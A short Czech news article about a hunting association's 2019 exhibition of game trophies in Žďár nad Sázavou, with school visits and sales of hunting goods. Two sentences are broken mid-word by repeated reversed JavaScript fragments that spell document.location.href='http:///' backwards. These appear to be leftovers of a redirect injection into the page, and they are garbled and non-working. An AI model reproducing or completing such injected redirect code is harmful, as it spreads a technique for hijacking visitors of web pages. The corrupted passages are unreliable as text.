Rainbow page separator

Myslivci vystaví ve Žďáře trofeje zvěře ulovené v loňském roce

Středa, 20. března 2019

Výstava trofejí

Žďár nad Sázavou / Od pátku 22. do neděle 24. března si ve velkém sále Hasičské pojišťovny v Komenského ulici mohou zájemci prohlédnout výstavu trofejí zvěře ulovené v roce 2018 v honitbách žďárského okresu.
Přehlídka, kde bude k vidění přibližně čtrnáct s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovek trofejí a kterou pořádá Okresní myslivecký spolek ve Žďáře nad Sázavou, je přístupná ve zmíněných dnech vždy v době od 8 do 17 hodin. Páteční dopoledne bude věnováno zejména školákům. „Každé skupině žáků zajistíme doprovod s odborným výkladem. Mládež by měla pochopit smysl a význam myslivosti pro zachování živé přírody. Pochopí, že myslivost není jen o lovu, jak je bohužel mnohdy prezen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továno,“ vyjádřil se za okresní spolek myslivců Stanislav Císař.
Výstava trofejí nabídne rovněž doprovodný prodej mysliveckých potřeb, výrobků z paroží, mysliveckého oblečení či zvěřinových uzenin a v rámci občerstvení nebude chybět ani nabídka zvěřinové kuchyně.